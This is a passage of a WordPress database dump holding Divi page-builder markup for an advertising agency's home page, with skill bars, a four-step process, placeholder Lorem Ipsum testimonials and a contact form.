box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"3px||0px||false|false\" custom_padding=\"30px||0px||false|false\" custom_margin_tablet=\"||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\" custom_margin_last_edited=\"on|phone\" padding_1_last_edited=\"on|phone\" padding_1_phone=\"0px|||10%|false|false\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" hover_enabled=\"0\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 19:41:05','2020-08-07 19:41:05','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(564,1,'2020-08-07 19:55:10','2020-08-07 19:55:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" 